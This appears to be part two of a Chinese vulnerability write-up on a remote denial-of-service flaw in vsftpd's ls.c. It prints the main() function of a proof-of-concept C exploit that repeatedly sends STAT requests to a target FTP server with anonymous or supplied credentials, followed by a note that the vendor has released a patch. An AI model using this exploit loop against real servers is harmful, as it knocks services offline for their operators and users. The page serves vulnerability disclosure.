vsftpd FTP Server “ls.c”远程拒绝服务漏洞(2)

int main(int argc,char *argv[])
{
        char *login,*pass,logindef[]="anonymous",passdef[]="cxib.net@127.0.0.1";

if(argc<3){
                printf("\nUse: ./vspoc232 host port [username] [password] [option]\nhost and port are requied\nuse option = 1 to skip recv() fails\n\nexample:\n./vspoc232 127.0.0.1 21 user pass 1\n\n");
                exit(1);
        }

char *host=argv[1];
        char *port=argv[2];

if(4<=argc) login=argv[3];
        else login=logindef;

if(5<=argc) pass=argv[4];
        else pass=passdef;

if(6<=argc) skip=1;

while(1){
                printf("----------------------------- next\n");
                sendstat(host,port,login,pass);
                sleep(1); // some delay to be sure
        }
        return 0; // never happen
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

Vsftpd
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwswjj.html